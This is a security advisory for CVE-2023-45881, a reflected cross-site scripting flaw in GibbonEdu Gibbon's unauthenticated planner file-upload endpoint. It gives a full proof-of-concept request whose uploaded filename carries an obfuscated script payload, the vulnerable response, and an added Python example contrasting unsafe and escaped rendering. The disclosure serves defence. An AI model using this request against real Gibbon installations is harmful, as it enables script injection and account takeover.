CVE-2023-45881: usd-2023-0024 - usd HeroLab

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.


usd-2023-0024 | Cross-Site Scripting

Advisory ID: usd-2023-0024
Product: Gibbon
Affected Version: 25.0.00
Vulnerability Type: CWE-79
Security Risk: High
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-45881

Description

GibbonEdu's Gibbon is open-source educational software for schools and institutions to manage their administrative and academic processes.
It offers a range of features that facilitate communication, collaboration, and organization within the educational community.

A reflected XSS was found in the filename of uploaded files.
It can lead to the creation of arbitrary, highly privileged accounts.

Proof of Concept

The application allows files to be uploaded without prior authentication via the

/modules/Planner/resources_addQuick_ajaxProcess.php

endpoint.

The following request can be used to upload files to the server:

POST /modules/Planner/resources_addQuick_ajaxProcess.php HTTP/1.1
Host: localhost:8080
[…]

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="id"

body
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyaddress"

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile1"; filename="…/<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
Content-Type: text/plain

<!DOCTYPE html>
<html><h1>hello</h1></html>
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile2"

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile3"

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile4"

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="imagesAsLinks"

Y
------WebKitFormBoundaryeSZWbY4RNteSpbi4--

The imagesAsLinks parameter must be set to Y to return HTML code.
The filename attribute of the bodyfile1 parameter is reflected in the response.

The response to the request looks like this:

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax
[…]

<a target='_blank' style='font-weight: bold' href='http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ_Go0qk7tKRgW0S9X8.gif'><img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>

Fix

It is recommended to treat all input to the application, including the filenames of uploaded files, as potentially dangerous.
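The following is an added illustration, not Gibbon's code or part of the advisory: it parses a constructed multipart body modelled on the request above, builds the link the way the response shows it (raw filename concatenated into HTML) and next to it a hardened version that encodes the reflected filename for its HTML context. The upload URL, the character allow-list for the stored name and the random-suffix omission are assumptions.

```python
"""Reflected XSS via an uploaded file's name: unsafe vs. hardened rendering.

Constructed example (not Gibbon's own code). The multipart body below is
modelled on the advisory's request; the payload name carries the same kind of
markup as the PoC.
"""
import email
import html
import re

BOUNDARY = "----WebKitFormBoundaryeSZWbY4RNteSpbi4"
# Constructed filename modelled on the PoC (path prefix left out).
PAYLOAD_NAME = "<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="imagesAsLinks"\r\n\r\nY\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="bodyfile1"; '
    f'filename="{PAYLOAD_NAME}"\r\nContent-Type: text/plain\r\n\r\n<h1>hello</h1>\r\n'
    f'--{BOUNDARY}--\r\n'
)
UPLOAD_URL = "http://localhost:8080/uploads/2023/07/"  # assumed upload directory


def uploaded_filename(body: str, field: str = "bodyfile1") -> str:
    """Return the client-supplied filename of one multipart field, untouched."""
    msg = email.message_from_string(
        f'Content-Type: multipart/form-data; boundary="{BOUNDARY}"\r\n\r\n{body}')
    for part in msg.walk():
        if part.get_param("name", header="content-disposition") == field:
            return part.get_filename() or ""
    return ""


def stored_name(filename: str) -> str:
    """Name used on disk: path dropped, allow-listed characters only (assumed
    allow-list; it reproduces the href in the advisory's response minus the
    random suffix)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "", base).lstrip(".") or "file"


def render_vulnerable(filename: str) -> str:
    """Link text built by raw concatenation: the filename's markup is live HTML."""
    return (f"<a target='_blank' style='font-weight: bold' "
            f"href='{UPLOAD_URL}{stored_name(filename)}'>{filename}</a>")


def render_hardened(filename: str) -> str:
    """Same link with every reflected value encoded for the HTML context."""
    safe = html.escape(filename, quote=True)
    href = html.escape(UPLOAD_URL + stored_name(filename), quote=True)
    return f"<a target='_blank' style='font-weight: bold' href='{href}'>{safe}</a>"


if __name__ == "__main__":
    name = uploaded_filename(BODY)
    print("reflected unsafely:", render_vulnerable(name))
    print("reflected safely:  ", render_hardened(name))
```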

References

  • https://cwe.mitre.org/data/definitions/79.html

Timeline

  • 2023-07-11: Vulnerability identified by Christian Poeschl
  • 2023-09-19: Security Release v25.0.01
  • 2023-11-02: Advisory published

Credits

This security vulnerability was identified by Christian Poeschl of usd AG.
